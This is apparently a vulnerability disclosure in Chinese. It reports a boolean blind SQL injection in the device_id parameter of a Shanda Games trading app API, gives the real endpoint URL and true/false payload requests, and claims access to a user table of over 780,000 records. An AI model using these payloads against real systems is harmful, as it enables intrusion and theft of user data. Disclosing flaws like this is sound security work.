盛大游戏某APP存在SQL注入(涉及78W+用户数据)

目标:盛大游戏G买卖Android APP检测发现以下地方存在SQL注入:(注入参数device_id,布尔盲注)
http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump¶ms={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a"}
Payload:
http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump¶ms={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a' and 'a'='a"}
http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump¶ms={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a' and 'a'='b"}
1、当前数据库用户

2、用户表,涉及78W+用户数据,具体就不深入了~